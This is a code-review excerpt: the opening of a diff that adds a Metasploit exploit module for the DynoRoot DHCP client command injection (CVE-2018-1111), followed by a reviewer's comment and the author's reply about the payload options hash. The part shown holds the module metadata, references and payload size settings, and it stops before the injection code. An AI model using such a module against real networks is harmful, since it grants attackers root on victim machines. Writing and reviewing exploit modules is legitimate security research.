modules/exploits/unix/dhcp/rhel_dhcp_client_command_injection.rb

```diff
@@ -0,0 +1,73 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::DHCPServer
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DHCP Client Command Injection (DynoRoot)',
+      'Description'    => %q{
+        This module exploits the DynoRoot vulnerability, a flaw in how the
+         NetworkManager integration script included in the DHCP client in
+         Red Hat Enterprise Linux 6 and 7, Fedora 28, and earlier
+         processes DHCP options. A malicious DHCP server, or an attacker on
+         the local network able to spoof DHCP responses, could use this flaw
+         to execute arbitrary commands with root privileges on systems using
+         NetworkManager and configured to obtain network configuration using
+         the DHCP protocol.
+      },
+      'Author'         =>
+        [
+          'Felix Wilhelm', # Vulnerability discovery
+          'Kevin Kirsche <d3c3pt10n[AT]deceiveyour.team>' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'Platform'       => ['unix'],
+      'Arch'           => ARCH_CMD,
+      'References'     =>
+        [
+          ['CVE', '2018-1111'],
+          ['URL', 'https://twitter.com/_fel1x/status/996388421273882626?lang=en'],
+          ['URL', 'https://access.redhat.com/security/vulnerabilities/3442151'],
+          ['URL', 'https://dynoroot.ninja/'],
+          ['URL', 'https://nvd.nist.gov/vuln/detail/CVE-2018-1111'],
+          ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1111']
+        ],
+      'Payload'        =>
+        {
+          # 255 for a domain name, minus some room for encoding
+          'Space'       => 200,
+          'DisableNops' => true,
+          'Compat'      =>
```

Comment:
I'd remove this hash altogether. `cmd` for `PayloadType` already includes most, and you're not specifying `RequiredCmd`. And this vuln isn't targeting an appliance or anything where the environment is known, so we shouldn't *need* to limit ourselves.

Reply:
Removed this for `PayloadType cmd` instead